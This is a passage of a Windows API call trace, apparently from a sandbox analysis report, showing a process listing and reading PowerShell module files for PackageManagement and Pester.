out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0281.035] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0281.035] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 0 [0281.035] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.035] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c850) returned 1 [0281.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c810) returned 1 [0281.036] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff [0281.036] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff [0281.036] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff [0281.036] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff [0281.036] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.dll")) returned 0xffffffff [0281.036] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8c610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0281.036] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.036] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cb40 | out: lpFileInformation=0x653ef8cb40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0281.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.037] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8c590, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0281.037] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x653ef8c7c0 | out: lpFindFileData=0x653ef8c7c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2bb0 [0281.037] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.037] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0281.038] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.038] FindClose (in: hFindFile=0x25b73cd2bb0 | out: hFindFile=0x25b73cd2bb0) returned 1 [0281.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.038] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c680, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0281.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cad0) returned 1 [0281.038] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cbb0 | out: lpFileInformation=0x653ef8cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8)) returned 1 [0281.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca90) returned 1 [0281.038] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c390, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0281.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c870) returned 1 [0281.039] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x948 [0281.039] GetFileType (hFile=0x948) returned 0x1 [0281.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7e0) returned 1 [0281.039] GetFileType (hFile=0x948) returned 0x1 [0281.039] ReadFile (in: hFile=0x948, lpBuffer=0x25b5c70c0f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c70c0f8*, lpNumberOfBytesRead=0x653ef8c948*=0x5f8, lpOverlapped=0x0) returned 1 [0281.039] ReadFile (in: hFile=0x948, lpBuffer=0x25b5c70b630, nNumberOfBytesToRead=0x208, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c70b630*, lpNumberOfBytesRead=0x653ef8c948*=0x0, lpOverlapped=0x0) returned 1 [0281.039] ReadFile (in: hFile=0x948, lpBuffer=0x25b5c70c0f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c70c0f8*, lpNumberOfBytesRead=0x653ef8c948*=0x0, lpOverlapped=0x0) returned 1 [0281.039] CloseHandle (hObject=0x948) returned 1 [0281.042] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0281.042] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0281.042] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0281.042] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0281.042] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0281.042] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.042] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0281.042] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8c760 | out: lpFindFileData=0x653ef8c760*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.043] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.043] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0281.043] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.043] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.043] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.043] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0281.044] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8c760 | out: lpFindFileData=0x653ef8c760*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.044] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.044] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0281.044] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 0 [0281.045] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0281.045] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0281.045] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8c5d0 | out: lpFindFileData=0x653ef8c5d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.045] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.045] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0281.046] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0281.046] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0281.046] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0281.046] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0281.046] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0281.047] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0281.047] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0281.047] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0281.047] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0281.047] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0281.048] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0281.048] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0281.048] FindNextFileW (in: 